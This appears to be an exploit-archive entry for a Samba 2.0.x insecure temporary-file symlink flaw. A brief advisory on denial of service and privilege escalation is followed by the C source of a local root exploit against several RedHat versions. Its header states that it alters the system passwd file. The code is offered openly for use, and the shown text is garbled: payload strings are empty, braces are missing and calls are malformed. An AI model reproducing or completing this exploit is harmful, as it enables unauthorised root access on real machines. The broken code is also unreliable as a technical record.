Samba 2.0.x - Insecure TMP File Symbolic Link








Samba is a flexible file sharing packaged maintained by the Samba development group. It provides interoperatability between UNIX and Microsoft Windows systems, permitting the sharing of files and printing services.

A problem in the package could make it possible to deny service to legitimate users. Due to the insecure creation of files in the /tmp file system, it is possible for a user to create a symbolic link to other files owned by privileged users in the system, such as system device files, and write data to the files.

This vulnerability makes it possible for a local user to deny service to other users of the system, and potentially gain elevated privileges. 

 * Samba Server r00t exploit
 * Scope: Local (this exploit) and posible remote if conditions are given.
 * Vuln:
 *      RedHat 5.1
 *      RedHat 5.2
 *      RedHat 6.0
 *      RedHat 6.1
 *      RedHat 6.2
 *      RedHat 7.0
 *      RedHat 7.1
 *      I don't know if other versions are vulnerable too.
 * Run this exploit and then take a look at your passwd file.
 * Run: ./samba-exp user
 * Author:      Gabriel Maggiotti
 * Email:
 * Webpage:

#include <stdio.h>
#include <string.h>

int main(int argc,char *argv[])
char inject1[]=
char inject2[]=
char inject3a[100]=
char inject3b[]=

        fprintf(stderr,"usage: %s <user>\n",*argv);
        return 1;
system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);

return 0;